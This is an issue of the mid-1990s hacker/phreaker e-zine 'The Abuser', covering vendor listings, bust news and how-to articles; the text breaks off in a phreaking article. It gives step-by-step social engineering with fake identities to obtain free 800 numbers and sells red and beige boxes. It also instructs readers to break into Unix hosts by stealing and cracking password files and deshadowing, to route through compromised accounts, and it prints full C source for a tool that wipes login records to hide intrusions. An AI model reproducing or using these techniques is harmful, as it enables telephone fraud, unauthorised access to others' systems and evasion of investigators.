Copy Link
Add to Bookmark
Report

The Abuser Volume 2 Issue 10

eZine's profile picture
Published in 
The Abuser
 · 4 years ago

  

Issue 10 Volume 2

* * * T H E A B U S E R * * *



Contents:

Disclaimer.....
Letter From The Editor.....
CAFBL News.....
More H/P Adds by Treason.....
How To Set Up 800 Numbers by Kaos.....
Underground News.....
Hacking The Information SuperHighway by Logik.....
Field Phreaking by Dog'n'Dirt.....
Stolen Internet Accounts: How Tired by Key Master.....


DISCLAIMER:

I nor any other person involved with the writing, programming, or
distributing of THE ABUSER take no responsibility for the person(s)
that read or obtain this magazine. The information in this magazine is
SOLELY for informational purposes only and anything described in this
magazine SHOULD NOT be attempted, since some material is ILLEGAL.
Furthermore, I nor any other person involved with THE ABUSER DO NOT
guarantee all or any information published in this magazine to be
one-hundred percent true and/or effective.


LETTER FROM THE EDITOR:

This is the first issue ever of THE ABUSER that hasn't been coded. From what
I hear Spiff is down at the shore for the summer (I guess he is entitled to a
break once in a while). To make up for the non-coded issue, this issue is
somewhat large than past issues.

Please take the time to fill out the ABUSER survey that is included
with this pack and return it to one of our distro sites. We would
appreciate it.

Check out the First Special Issue of THE ABUSER also included in this
pack. It is not coded and not very H/P related, but is an inside look
at CAFBL. You should enjoy it.

I was told by Spiff to check out the INFINITY E-Mag #2 because THE ABUSER
issue 9 got reviewed in there this month. So I did, and I was happy to see
that we made third in the rating list. Also it was good to see what other
people thought of the mag. There hasn't been too much feedback other than
'you guys rock' or 'you guys suck'. So thanx to the INFINITY staff for
taking the time to check us out.


CAFBL NEWS:

There isn't too much "CAFBL NEWS". We are putting THE ABUSER with
regularity now and it can be a magazine that can be depended upon to
be released monthly. CAFBL hasn't been doing much other releasing. We
are all working on inside projects even a local 215 television show.
We would like to welcome Logik (whose first article is in this issue)
to CAFBL. He knows more about hacking than most of us in the group (as
you could probably tell, most of us are phreaks) and has a lot to
contribute. We would also like to welcome Neko and Low Level into CAFBL.
Please check out the CAFBL.NFO file for the latest member list and distro
list.


MORE H/P ADDS BY TREASON:

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - .
Treason's Phat Product List
by
Treason [518]
treason@fpg.gcomm.com
. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - .

Cable Descrambler Ordering List
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ÄÙÄÄÄÄÄÄÄÄÄÄÀÄ
³ û = Yes ³
³ þ = Nope ³
³ ? = Dunno³
Ä¿ÄÄÄÄÄÄÄÄÄÄÚÄ

-Number- -Name- -Catalog-
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄ¿
³[800] 729-1776 ³ TKA Electronics ³ û ³
³[800] 835-2330 ³ Multi-Vision ³ û ³
³[800] 655-2002 ³ MicroCom Inc. ³ û ³
³[800] 624-1150 ³ MD Electronics ³ û ³
³[800] 818-9688 ³ US Cable TV Inc ³ û ³
³[305] 425-0751 ³ Cable Descramblers ³ þ ³
³[800] 677-0321 ³ VCI ³ ? ³
³[800] 906-6664 ³ Modern Electronics ³ û ³
³[800] 833-2915 ³ Genuine Electronics ³ ? ³
³[800] 288-7404 ³ Nu-Tek Electronics ³ û ³
³[800] 284-8432 ³ ??? ³ ? ³
³[800] 334-8475 ³ Add-on Cable Company ³ ? ³
³[800] 950-9145 ³ JP Video ³ ? ³
³[800] 682-9968 ³ Elite Electronics ³ û ³
³[800] 258-9512 ³ AA Electronics ³ ? ³
³[800] 775-0444 ³ TC Electronics ³ ? ³
³[800] 676-6342 ³ Mega Electronics ³ û ³
³[800] 254-2880 ³ Newtronics ³ Call ³
³[800] 583-4370 ³ ??? ³ ? ³
³[800] 284-8432 ³ Cable Warehouse ³ û ³
³[800] 243-3967 ³ Skyline Systems Inc ³ ? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÙ

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - .
Treason's Products -/- treason@fpg.gcomm.com

Red Box - $15
Beige Box - $7
Email For More Product List

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: cDc communications/P.O. Box 53011/Lubbock, TX
79453/sratte@phantom.com

This is Swamp Ratte's stuff:

All the cDc t-files on disk by mail, for convenience sake!
Specify MS-DOS or Apple II format 3.5" disks. $3.00.

cDc stickers! Same design as were flying around at HoHoCon,
with the scary-lookin' cow skull. k00l. Send a SASE and 50
cents for a dozen of 'em (or just send a dollar).

cDc hat! Yeah, get your very own stylin' black baseball cap
embroidered with the cDc file-header-type logo on the front in
white. This isn't the foam-and-mesh cheap kind of hat; it's a
"
6-panel" (the hat industry term) quality deal. Roll hard with
the phat cDc gear. $15.00 plus a buck for postage. An
unsolicited quote from THE NIGHTSTALKER regarding his hat:

"
The hat is really spiffy, and I know it'll be getting me the
respect and women I deserve! I feel SO elite!" Y0wZa.

Weasel-MX _Obvious_ 45-minute cassette, 1992. This is Swamp
Ratte's funk/punk-rock/hip-hop band. It's a mess, but fun.
$3.00 + $1 postage.

_Swingin' Muzak_ compilation tape! An hour of rockin' tuneage
from Weasel-MX (all new for '93), Counter Culture, Acid Mirror,
Truth or Consequences, Grandma's V.D., and Sekrut Squirrel.
Lotsa good, catchy, energetic stuff for only $3.00 plus $1
postage.

Weasel-MX new for '94, _Cracker Gasoline Party_ hour-long tape.
Hella-crossed-over hardcore hip-hop/punk. $3.00 and a buck
postage.

Tragic Machine's '94 album-length cassette, _Placenta_ can be
yours for a mere 3+1. Crush-yer-haid heavy punk/metal.

Send well-hidden US cash or postal money orders made out to
"
cDc communications". Thanks.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From: FNORD! Publications/2660 Trojan Dr. #912/Green Bay, Wisconsin
54304-1235 obscure@cypher.com

This is Obscure Images' stuff:

FNORD! 'zine #1 & #4 - $2.00 Each

Shoggoth 912 #1 - $0.75

For some snarly techno grooves, send away for the new tape from
Green Bay's finest (and only) technorave sensation, I OPENING!
IO-Illumination
Demo Tape (7 songs of joy) - $5.00
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: O.I.S./ATTN:HoHoCon/1310 Tulane/Houston, TX 77008-4106
drunkfux@cypher.com/713-867-9544(voice mail)

This is Drunkfux's stuff:

The shirts are $15 plus $3 shipping. At this time, they only
come in extra large. I may add additional sizes if there is a
demand for them. The front of the HoHoCon '92 shirt has the
following in a white strip across the chest:

I LOVE FEDS
(Where LOVE = a red heart, very similar to the I LOVE NY logo)

And this on the back:

dFx & cDc Present

HOHOCON '92

December 18-20
Allen Park Inn
Houston, Texas

There is another version of the shirt available with the
following:

I LOVE WAREZ

The HoHoCon '93 shirt is available in both XL and XXL and has
the following across the chest in a really spiffy outlined font :

NARC

And this on the back:

HOHOCON '93

Top Ten Narc List

1. Traxxter
2. Scott Chasin
3. Chris Goggans
4. Agent Steal
5. Dale Drew
6. Cliff Stoll
7. [insert here]
8. Julio Fernandez
9. Scanman
10. Cori Braun

The [Blank] on #7 is actually an empty white strip where you can
write in whoever you deem deserving enough to join this elite
group.

The HoHoCon '93 video should be available in the first week of
February and is sure to be just as chaotic as last year's.

New for '94 - I LOVE COPS embroidered baseball hats are now
available for $18. Mega-high quality, one adjustable size fits
all egos.

The '92 video includes footage from all three days, is six hours
long and costs $18 plus $3 shipping. Please note that if you are
purchasing multiple items, you only need to pay one shipping
charge of $3.00, not a charge for each item. If you wish to send
an order in now, make all checks or money orders payable to
O.I.S., include your phone number and mail it to the street
address listed above. Allow a few weeks for arrival.

Thanks to everyone who attended and supported HoHoCon '92 & '93.
Please mail me if you wish to be an early addition to the
HoHoCon '94 mailing list or if you require any additional
information.

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - .

[...More Phat Products...]

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - .

Voice Changing Telephone -
Complete handset type telephone that changes the caller's voice, has
six different voices, comes in pulse only and white color. Full
unconditional moneyback guarantee. Send check or money order for
$23.00 plus $2.9o S&H to :

Wonder Marketing
111 East 14 Street
Suite 323
New York, NY 10003

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

TAP Back Issues -
Complete set Volumes 1-91 of quality copies from originals, includes
schematics and indexes. $100 Postpaid. Via UPS or First Class Mail.
Plus copy of 1971 Esquire articles "
The Secrets of the Little Blue
Box" $5 & large SASE w/52 cents of stamps. Also ELECTRONIC
SURVEILEANCE DETECTION EQUIPMENT for RF and telco devices from
retiring TSCM specialist. Complete set $45oo.
Send SASE or fax # for more info to :

Pete G.
PO BoX 463
Mt. Laurel, NJ 08054

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

Undergroud Sources -
Hundreds of reviews of books, catalogs and mags, complete w/addresses,
telephone/fax numbers, and email for all of your electronics,
telephone, privacy, surveillance, hacking and other special needs.
Send SASE for more info. Only $17 + $3 s/h case, check or money order
to :

Bob Paiani
3686 King St.
Suite 145
Alexandria, VA 22302-1906

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

PrivatePage -
If you do most of your work within a few miles of your home or office,
get rid of that pay-by-the-month pager clipped to your belt and become
your own paging service. PrivatePage is a local paging system that
provides unlimited paging through a self-contained system that easily
fits into the corner of a desk. The powerful 7-watt based transmitter
can send up to 10 different message codes to one or all pagers on your
system, which is up to 100. PrivatePage system includes one pager, is
$229.95, for the main unit and for each additional pager only $69.95.

Command Communications Inc
(3o3) 751-7000 Fax
(3o3) 750-6473 Voice

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

Anarchist's Cookbook - $25
Barricade Books
Box 1404-X
Secaucus, NJ o7o96

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

Sourcebook of Forbiden Devices -
For outlaws. Sourcebooks of forbidden devices and knowledge. Write for
more info to :
365-X1
Penfield, NY 12526-l365

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

Radar Jammers -
Every driver should have one. The all new Mirage 2oo1 uses
electronically generated white noise interference to scrambler target
radar signals. Radar guns cannot computer a signal that has been
affected by white noise interference and will not display any speed.
The Mirage 2oo1 installs like a detector and comes complete with
adjustable mount and auxiliary power cords. Also the Mirage uses the
latest advancing passive mamming technology which are 100& FCC
legal!! 30 month warranty. Order toll phree 800.732.0044 or write to :
TEK Distributors
PO Box 32287
Fridely, MN 55432

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

Skeleton Key -
Satisfaction guaranteed or a full refund. 2 weeks delivery. Send $8.95+
$2 shipping and handing to :

Safe Marketing
90 W. Montgomery Ave No 366F
Rockville, MD 20850

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

Secret Scanner Frequencies -
Federal Agencies, Pigs, more!! Phree catalog!

CRB
Box 56
Commack, NY 11725

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

Surveillance & Countersurveillance Electronic Devices -

Covert Video Cameras ù Transmitter Kits ù Voice Changers
Bug & Phone Tap Detectors ù Shotgun Mics ù Micro Recording
Vehicle Tracking ù Locksmithing ù MORE!!

7 - Hour Telephone Recorder Tapes - $125.oo
Incoming/outgoing phone calls automatically!

$5.o0 Catalogs

SPY Outlet
PO Box 337
Buffalo, NY 14226

(716) 691- 3476

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

Telephone Listening Device -
Record telephone conversations in your office or home. Connects between
any cassette or tape recorder and your telephone line. Starts
automatically when phone is answered. Records both sides of
conversation. Stops recorder when phone is hung up.


For Both VVV $19.95 ^^^ + 1$ S/H

FM Transmitter -
Many times more powerful than other transmitters. Transmits up to 1/4
mile to any FM radio. Easy to assemble kit, up to 9V batter.

For catalogs of Transmitters, Voice Scramblers and other specialty
items enclose $2.

(407) 725-1000
USL Corp
Po Box PM-2o52
Melbournce, FL 329o2

. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . - .. - . -

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ThE EnD
For More Information Contact The Author Over The Internet At :

: treason@fpg.gcomm.com :

Leave, Suggestions, Ideas, More Information and Collective Critism
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


HOW TO SET UP 800 NUMBERS BY KAOS:

What's up people? Its me kaos with another release for The Abuser.
This month I wanted to write about something that can help everyone
and something that we can all use. What could it be? Simple. 800#'s.
Setting up an 800# to your personal line, modem line, or fax line is
a lot easier than people think. AT&T doesn't seem to care too much
about it so why not get one? Best of all, its free! Ripping off the
phone company is just one of those things that has to be done :) A lot
of people have been concerned about getting caught or getting in
trouble with AT&T. This simply won't happen. I do not know of anyone
that has gotten in trouble for an 800. If you did hear about that, I'd
like to know what happened so just leave me a message on my VMB (I'll
post the number at the end of the article). Ok, back to the article.
Here is a step by step procedure on how to set up 800#'s for your own
personal use.
[1] Get the name, number, and address of a local business in your area
code.
Make sure you have all of this info:
FAKE NAME (for billing reasons)
NAME
STREET ADDRESS
CITY, STATE & ZIP
PHONE NUMBER OF THE LINE THAT WILL BE GETTING THE 800#

[2] You will not need the phone number of the business because this is
where you will be putting the number of the line you need the 800#
to. You might need some social engineering skills but it is
relatively easy.

[3] Go to a payphone somewhere. Call up the operator and have her
connect you with 1-800-222-0400. This is just to kill ANI. I know
you don't want them to know you are calling from a payphone right?

[4] Here's where your social engineering skills will come into play.
Once you get to the AT&T operator, tell her that you would like to
set up an 800# for your business. She will tell you about the
service and mention some features etc., so be ready for anything.
Make sure you tell her that you want READY LINE SERVICE. This
service is the best you can get and will keep the line up for a
long time. Keep her talking and listen to what she says.

[5] If you want, there is a neato feature that you can add to your
800#. Number Selection. Kamui of Cafbl has an 800# up to his
board. When I first set it up, I asked for 1-800-X-PSYCHO (x=0-9)
but it was unavailable. Try it! Ask for a number and see if you
get it.

[6] Ok, now all you have to do is give her the info that you got out
of the phonebook and a fake name. After this, you should be all
done. Now have a pen ready to write down the number. Tell her to
have a nice day and that's it. Simple huh?

BELOW IS AN EXAMPLE OF ME SETTING UP AN 800#... .. . .

[kaos] Hi, I'd like to set up an 800# for my business.
[them] Ok sir, just a second.
[kaos] No problem.
[them] Ok sir, what is your name?
[kaos] Jim Mainor.
[them] What is your area code and phone #? <Give her the # of the
board>.
[kaos] 215-387-0003
[them] Ok. What is your billing address?
[kaos] 666 JoeMama Drive.
[them] Ok. What is the city, state and zip code there?
[kaos] Its Philadelphia, PA 19146.
[them] Ok. And what is the name of your business?
[kaos] Mainor Shoes Incorporated.
[them] Ok. Would you like your 800# listed in the directory.
[kaos] Ok. Sure. Also, I heard it was possible to pick the 800# that I
will have. Can I do that now?
[them] Sure. What would you like the number to be? I'll check and see
if we have the number available.
[kaos] Do you have anything with 243373 (cheese :)
[them] Let me check.
<*NOTE* do not give her the word you want, give her the numbers>.
[kaos] Ok, no problem.
[them] sir we have three combinations with 243373.
[kaos] Ok, I'll take the first one.
[them] Ok sir, now we have various different plans for 800#'s. Do you
know how many hours the 800# will have in a month.
[kaos] I'm not really sure but I know there will be a lot of use out of
it. A friend of mine has an 800# for his business and he told
me for a lot of use that I should get something called READY
LINE SERVICE.
[them] Ok, I'll set you up with that plan then.
[kaos] Ok, great.
[them] Please do not give out the number until you know that it is
working.
[kaos] Ok. No problem.
[them] Well then your 800# is 1-800-624-3373
[kaos] Ok.
[them] This # will be up in 2-3 working days.
[kaos] Ok, great. I think that's about it then.
[them] Ok sir, have a nice day. ba-bye.
[kaos] bye! <suckers>

<*NOTE* NEVER MENTION THAT THE 800# IS FOR A MODEM LINE! IF YOU DO
THAT, YOU FUCKED UP!>

For technical support, I can be reached at 1-800-245-0799 (inside the
U.S.). I can also be reached at 1-800-925-9999 ##719 (in Canada). Or
just catch me on irc in #cafbl. I go by kaos on irc.


UNDERGROUND NEWS:

RECENT BUSTS 5/12/95:

I can only hope that these occurrences are at their end... The secret
service and telco security have been making busts nationwide including
some notables in the scene... Among the crucified are Neon Samurai (amitech)
Knight Lightning (aka craig neirdorf), Tokin Entry (amitech) and Hellfire
It seems the feds had a DNR (dial number recorder) on a few h/p'ers lines.
There's no evidence that the busts are over. Neon Samurai has been charged
with 3 felonies... From all reports the feds seem to be looking for credit
call card fraud. Also PBX's Vmb's and some internet hacking. Cell phones
also top their charts.. There's no other evidence available at the moment...
The resistance bbs is gone for the interest of my own private freedom.
Maybe it will move and go up again keep your eyes and ears open. The scene
is not a private place in fact it is said that agents were planted on
UPT and celco51, how we don't know but it's enough to let us all know that
the authorities are getting craftier... On a humorable side note it was
estimated by NYNEX that Neon Samurai had $50,000 in stolen telco property
in his possession (jeez I told him not to steal that dms-100!)... Well
this is a very serious and real subject. I'm counting on the ability of
the scene to spread info quick so that people know before it's too late.
Look if you want to be safe, keep to yourself because in this country even
the walls have ears.......

Luck to all those busted,
Arkane.Amitech,Music Phreak.Amitech

WHAT HAPPENS WHEN YOU GET CAUGHT BEIGE BOXING BY RUSH 2:
[Republished without permission from PHRACK 47]

Yeah , I'm the only one. But here is a generally interesting
description of everything to getting caught to arraignment.

Well about 5 months ago i needed to set up a conference really quick.
it was about 12:00 (never knew there was a 10:00 pm curfew in that area) and
went to a 25 pair box at this local strip mall. Well I was out there the box
was already open and I was just about to start testing pairs to see which was
connected and what wasn't.

All of a sudden, i hear this loud screeching sound of a car coming
to a skid from doing about 90mph. I turned and saw that typically dirty
squad car about to hit me.. you know the car, mud and dust on the tires and
body, coffee and smudge marks all over the windshield. i got on my bike and
started to run. Now the thing is I COULD have gotten away.. the pathetic
excuse for a cop had run not more than 10 yards after me and decided that I
was a threat so he pulled his handgun and yelled. I saw this and thought it
would be wiser to stop than get shot.

Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did
not know i was less than a half mile from a police station and they were
looking for a prowler in the general area. The police did the normal, called
me scum, asked me what i was doing, searched me until they were satisfied...
than picked me up and threw me in the car... the funny
thing was they didn't see my phone until they threw me into the back seat and
the cord fell out.. (they never saw the page of notes and 'naughty' material
in my pocket though it was about 4 inches thick and sticking out that a blind
man could see it.

Well they got me to the station and pried my info out, and called my
father... I came up with a good enough story about some made up user who told
me to go across the street and plug in.. then I was told I would be dealt
with in the next week... I did not receive anything for three and a half
months.

Once the time came for the arraignment (for a juvenile they called it
an intake). I got to go to the police station, sit for about 3 hours (as if
i thought they would be on time) until I waited for my probation officer.
Finally she got there and we proceeded to talk. She explained all of the
charges and my lawyer (interesting guy) laughed, I was being charged with
prowling (could be disputed I was on a public sidewalk and there in that
strip mall is a 24 hr laundry mat), loitering (again that could be disputed),
and attempted theft of services (though I NEVER even plugged in).

After this was all said i spent the next hour talking with the lady
in private. I immediately found she had an interest in computers and was
having a problem with her home pc. So I easily changed the topic to my
fascination in computers and solved her problem with her computer, and
answered at least 50 questions about them. In the last 10-15 minutes of the
conversation all i could get from her were statements about how impressed and
how intrigued she was with me. She ended up giving me a look (that was hard
to judge but i am staying away from this chick) that was either confusion or
attraction, slipped me a card with her home phone number and name and called
back in my lawyer and parents.

Once they got back in, all that she really said was I was a great boy,
that she would like to see me do more with my time besides computers, and
that she was taking my sentence of 12 months formal probation with 300 hours
of community service to 3 months of informal probation with 30 hours of
community service. That and she said bell was asking her what to do and she
would tell them that it was a non issue since I did not plug in and even if I
had it would not be their concern unless I had plugged in to the telco access
part of the network interface.

Well I have yet to receive official record of having to perform the
community service or the probation but I called my probation officer
yesterday and said she wasn't putting the community service into the
punishment and it has been an equivalent amount of time to just say that
since I haven't gotten in trouble since she will count the probation as
already served. Luckily she based all other needs of me on the report from a
teacher, and with my luck she picked the one teacher, my computers teacher,
that no matter what I did or said would lie and say I didn't.


HACKING THE INFORMATION SUPER HIGHWAY BY LOGIK:

~Introduction~
Everywhere you look these days you'll see something about the
information super highway, or what it is sometimes better know as the
Internet. This computer network is very large and holds a great wealth
of information. The only catch being one most know where to look for it.
The other problem is a lot of the time the most valuable information is
protected by a tight security system, or so the sysadmins think. Still,
just because a system may look secure, doesn't mean it is. Remember, the
only "
safe" computer is one that's locked in a vault six feet underground
and doesn't have a modem (or any such connection system) hooked up to it.
So, how does one access the hidden information inside the depths of the
Internet? Continue to read and you'll find out. Oh yeah... and I'm making
the assumption that you already know how to get around on the internet.

~A Little Background~
The best way to understand the present is to know a little about
the past. So, let's look at the origins of the information super highway.
The Internet is actually a collection of several different computer networks
and subnetworks. The first (ARPANET) was implemented in 1969 by the United
States government. Then, in the early 1980's the TCP/IP protocol became the
standard for the Internet. In 1983 ARPANET (which was called APRA Internet
or DARPA Internet) was broken down into ARPANET and MILNET. Today, with the
expansion to LAN (Local Area Network) and WAN (World Area Network), the
Internet is 2000+ networks strong. Included in this group is military,
commercial, and university systems.

For many years the Internet was very elitest and hard to navigate.
Only people who knew what they were doing could use it. However, with recent
improvements to the network (such as SLIP and PPP) it has become a little bit
easier to get around. Also, new additions to the Internet such as the World
Wide Web have helped too. With this has come the addition of many smaller
"
sites" to the internet. Many of which have valuable information within them.
Now all you need to do is find and get into them.

~Security~
The best way to beat anything is to know your enemy. Which in this
case is network security. May it be a university, company , or the
government. Just remember. Anyone you hack CAN track you thru the internet
if they really want to. However, chances are the company or university will
just let you go (if you are noticed) because it would either be too much of
a hassle or too embarrassing for them to go after you. Still, the government
and telephone companies are rarely as nice. The bigger the organization
behind the Internet "
site", the more likely they are to go after you. Try to
stay away from big places. They probably have more people attempting to hack
them. So, they'll have better security and more reason to catch anyone they
can.

According to the computer security standards developed by the United
States Department of Defense there are seven different levels of security.
The first, D1, is the lowest form of security available. This applies to
systems that are totally unprotected (such as common DOS, Windows, and Mac
computer systems). This system can not tell the difference between users and
does not have any controls over what information can be accessed on the hard
drives of that computer.

The second security level is C1, or Discretionary Security Protection
system. This describes the typical internet site security. The system
requires a user login name and a password. There is usually restrictions on
file and directory permissions. This is set by the sysadmin and is used to
prevent certain people or groups to access programs or information.

The third security level is C2. This is much like the C1 level, but
it goes further. Level C2 has the ability to further limit users from
executing certain commands. It also keeps records of all security-related
events. This allows the true sysadmin to know who executed what when.

The fourth level is B1, or Labeled Security Protection. This level
allows multilevel security, such as secret and top secret. More so, this
level states that an object cannot have its permissions changed by the owner
of the file.

The fifth level is B2, or Structured Protection. This level demands
that every object (such as disks or terminals) be labeled. Also, to each
device a security level (multi or single) must be assigned so objects with
different security levels can't interact.

The sixth level is B3, or Security Domains Level. This level demands
that a user's terminal must be connected to the system thru a trusted. Also,
there is protection for the security domain from unauthorized access or
modification of objects.

The seventh and final level is Level A, or the Verified Design Level.
This is, currently, the tightest security for a computer system. For Level A
security to be achieved, all the lower security levels must be implemented
and the software and hardware must be protected before shipment. This is to
prevent tampering with the security systems.

~Hacking~
So, now that all that is out of the way let's get to what you really
want to know. How to hack the Internet. Okay, first find a good site. You
should use Telnet to access these systems. More then likely the site you'll
find will run Unix, or some derivative. If not, you may have a harder time
with getting in. Basicly, the only way to get into a system is to brute force
hack an account, trade for an account on the system, social engineer an
account, or find one while trashing. Also, you could do a little Ethernet
sniffing, but if the site is running a firewall, it probably won't work. I
really hate to just leave the actual getting in the system to this, but the
ways I've listed are the only ways I know of. Then again, you could FTP into
the site (if they have anonymous FTP) and try to download the passwd file,
but sysadmins these days rarely are stupid enough to leave the passwd file
accessible thru anonymous FTP.

Once you're in the "
site" you get to have some fun. I'm assuming that
you hacked out a regular user account (seeing as accounts such as "
bin" and
"
root" usually have complex passwords and can't be guessed). So, you are now
at some sort of Unix-type prompt. Now what? Well... always check out that
user's mail and look around in his/her directory. You may actually find
something interesting. After you look around, you'll want to find the passwd
file. As you probably already know, the passwd file holds the encrypted
passwords of every user on that system. This is the easiest way to get
control of the system (by running a program such as Cracker Jack and finding
out the root password that way). So how does one go about finding the passwd
file? Well, first look in the /etc directory. It should be there. What you
want to then do is "
cat" the passwd file. This will dump the contents of the
passwd file to your screen. If you're lucky it'll contain the encrypted
passwords of that system's users. How can you tell if you've found the right
one? Well, if you "
cat" the file and you see something like this:
chare:2eLNss48eJ/GY,C2:215
then you've found the right file. If this happens, do a screen capture and
"
capture" the contents of that file for later use. However, on systems with
higher security (such as large Internet providers and companies) the passwd
file is more then likely shadowed. This means that the passwd file does
not contain the encrypted passwords and that Unix (or such software) looks
elsewhere for the encrypted passwords. Thus, YOU must look elsewhere for the
shadowed password. The shadowed passwd file is usually located in a place
where normal users can't access it (such as the /root directory). The best
way to get around this is to run a deshadowing script on the system. You can
find one of these on the Internet at ftp.netcom.com /da/daemon9. You must
ascii upload this file to that site (because you can't upload and download
things thru Telnet, except for ascii). Once you have deshadow.c on that site,
compile and run it. It should output the shadowed passwd file. If it doesn't,
then you must go about another way to hack root at this site.

There are several ways to go about this. First, if the deshadowing
thing doesn't work, try "
ypcat passwd". Sometimes, if the system you're on
uses NIS/YP, that'll output a valid passwd file. If that doesn't work, a
great way to gain root access is thru IP Spoofing. IP Spoofing is when a host
that is not connected to the network makes it look like they are one of that
system's trusted hosts. This is done by changing the alien site's IP number
to match that of the trusted host. You can find trusted hosts by looking at
the "
hosts.equiv" and ".rhosts" file. These should list the trusted hosts.
However, this is easily beat by the sysadmins if the implement a firewall
that can check the origin of the IP address. So what can a hacker do when
caught up in this mess? Well, the best advice is to do some research on that
software. Talk to people and see if there are any known holes in that system.
If you're lucky one of the holes will work. To date there are way too many
holes to list in detail. So, you'll have to find them on your own.

Once you have root access on that site, look around. You now have
complete run of the system. Check out other people's mail. Read that
"
Classified" information that you were after so much. Look for any valuable
programs. Have fun. You have gotten what you wanted.

~Don't Get Caught~
The last thing you need to do is not get caught. This is a little
more tricky. See, if you are on a computer "
site" that wants to come after
you, they can. It is very easy these days to track where a incoming telnet
connection came from. Thus, you need to hide your tracks. The best way to do
this is to run it thru several hacked out accounts. How does one get these?
Well, read the last part about hacking. That should tell you. If you're just
starting at hacking, and can't hide your tracks too well, at least trade for
an account or something. Also, I would suggest that if you are hacking any
high security places (such as government or telephone company computers) that
you run your call thru several outdials and possibly even a PBX or two.
Remember, "
just because you're paranoid. Don't mean they're not after you".
Also, once you're finished doing your hacking, edit the system logs so it
looks like you were never there. You can't do this with the plain text editor
that most Unix-type sites have. You must write a short little program to edit
the /etc/utmp. /usr/adm/wtmp, and /usr/adm/lastlog files. Here's an example
taken from the HACK.FAQ:

--------------------------------START----------------------------------------

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "
/usr/adm/wtmp"
#define UTMP_NAME "
/etc/utmp"
#define LASTLOG_NAME "
/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("
%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("
Zap2!\n");
} else
printf("
Error.\n");
}
--------------------------------------END------------------------------------
Just compile and run it. This should work. Other then that, ALWAYS
do a "
who" when you log onto a system to make sure no other high security
level person is watching you. They may be able to tell you are hacking the
system, and that could lead to some serious problems.

~Conclusion~
Now you should know most of what you need to know on how to hack the
information super highway. Granted, there are many things missing from this
text file. However, if I was to write everything on hacking the Internet,
this file would be way too long. So, look around for more help on hacking as
you need it. We all can learn more.


FIELD PHREAKING BY DOG'N'DIRT:

Intro: The purpose of this file is to help you develop a small background
in the fine art of Field Phreaking. This is by no means a complete file.
Rather it is a short, concise Introduction to Field Phreaking.



1.0 The Kit: The most important part of the Field Phreak besides his mind
is his Field Kit. I am going to present two full kits. The first kit
that I will present is a kit that is completely made from items that
I have found around my home. If I felt that something had to be bought
